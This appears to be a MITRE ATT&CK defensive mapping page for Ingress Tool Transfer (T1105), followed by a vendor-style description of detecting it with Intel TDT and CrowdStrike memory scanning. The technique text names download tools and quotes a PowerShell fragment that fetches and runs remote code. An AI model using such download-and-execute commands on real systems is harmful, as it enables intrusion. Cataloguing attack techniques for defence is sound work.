Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| intel-tdt | Intel Threat Detection Technology | CrowdStrike AMS | T1105 | Ingress Tool Transfer |
Comments
Intel Threat Detection Technology (TDT) and CrowdStrike Falcon Accelerated Memory Scanning (CAMS): Defending Against Ingress Tool Transfer Attacks
Intel Threat Detection Technology (TDT), combined with CrowdStrike Falcon Accelerated Memory Scanning (CAMS), strengthens cybersecurity defenses by enabling faster, real-time detection of Ingress Tool Transfer (ITT) attacks. This integrated solution enhances CrowdStrike Falcon, improving its ability to detect and mitigate cyber threats earlier in the kill chain, all while minimizing system performance impact.
Ingress Tool Transfer involves adversaries transferring malicious tools or scripts into a compromised environment, often to establish footholds, escalate privileges, or execute additional stages of an attack. These tools can be transferred through various methods, such as file-sharing services, network shares, or utilizing external media like USB devices. In the context of a larger attack, this transfer is a critical phase that allows the attacker to introduce malicious payloads, enabling further exploitation of the system.
Intel TDT plays a crucial role in identifying these threats by providing deep, real-time telemetry on program execution, memory access, and control flow. This telemetry helps security teams rapidly detect abnormal behaviors, such as unauthorized file transfers, network communications, or tool downloads that could signal an ingress tool transfer. By monitoring these low-level activities, TDT makes it easier to identify the transfer of malicious files, scripts, or other tools commonly used to expand the attack surface.
References
|